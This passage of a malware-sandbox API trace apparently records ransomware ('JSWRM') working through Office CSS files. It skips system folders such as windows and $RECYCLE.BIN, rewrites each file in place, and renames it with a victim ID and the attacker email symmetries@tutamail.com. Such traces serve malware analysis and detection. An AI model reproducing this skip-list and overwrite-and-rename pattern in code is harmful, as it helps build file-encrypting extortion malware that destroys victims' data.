dwFlags=0x0, lpWideCharStr="SCHEME30.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME30.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0117.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0117.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME30.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME30.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME30.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0117.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0117.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0117.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME30.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme30.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.499] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=120098) returned 1 [0117.499] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d520) returned 0x24c1d0 [0117.499] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d520, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1d520, lpOverlapped=0x0) returned 1 [0117.530] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.530] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d520, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1d520, lpOverlapped=0x0) returned 1 [0117.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.530] CloseHandle (hObject=0x314) returned 1 [0117.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0117.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0117.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0117.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0117.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0117.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0117.531] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME30.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme30.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME30.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme30.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0117.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0117.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.532] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d652, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME31.CSS", cAlternateFileName="")) returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2=".") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="..") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="...") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="windows") returned -1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="recovery") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="perflogs") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="documents and settings") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="system volume information") returned -1 [0117.532] lstrcmpiW (lpString1="SCHEME31.CSS", lpString2="msocache") returned 1 [0117.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0117.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME31.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME31.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME31.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0117.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0117.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME31.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME31.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME31.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0117.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0117.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0117.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME31.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme31.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.534] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=120402) returned 1 [0117.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d650) returned 0x24c1d0 [0117.534] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d650, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1d650, lpOverlapped=0x0) returned 1 [0117.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.582] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d650, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1d650, lpOverlapped=0x0) returned 1 [0117.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.582] CloseHandle (hObject=0x314) returned 1 [0117.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0117.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0117.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0117.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0117.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0117.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0117.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0117.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME31.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme31.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME31.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme31.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0117.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.584] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eb20, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME32.CSS", cAlternateFileName="")) returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2=".") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="..") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="...") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="windows") returned -1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="recovery") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="perflogs") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="documents and settings") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="system volume information") returned -1 [0117.585] lstrcmpiW (lpString1="SCHEME32.CSS", lpString2="msocache") returned 1 [0117.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0117.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME32.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME32.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME32.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0117.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0117.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME32.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME32.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME32.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0117.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0117.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME32.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme32.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.586] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=125728) returned 1 [0117.586] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eb20) returned 0x24c1d0 [0117.586] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1eb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1eb20, lpOverlapped=0x0) returned 1 [0117.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.597] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1eb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1eb20, lpOverlapped=0x0) returned 1 [0117.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.619] CloseHandle (hObject=0x314) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0117.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0117.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0117.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0117.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0117.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0117.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME32.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme32.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME32.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme32.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0117.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0117.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0117.621] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xab7525c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xab7525c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab7525c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1dcb0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME33.CSS", cAlternateFileName="")) returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2=".") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="..") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="...") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="windows") returned -1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="recovery") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="perflogs") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="documents and settings") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="system volume information") returned -1 [0117.621] lstrcmpiW (lpString1="SCHEME33.CSS", lpString2="msocache") returned 1 [0117.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0117.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME33.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME33.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME33.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0117.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0117.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME33.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME33.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME33.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0117.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0117.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 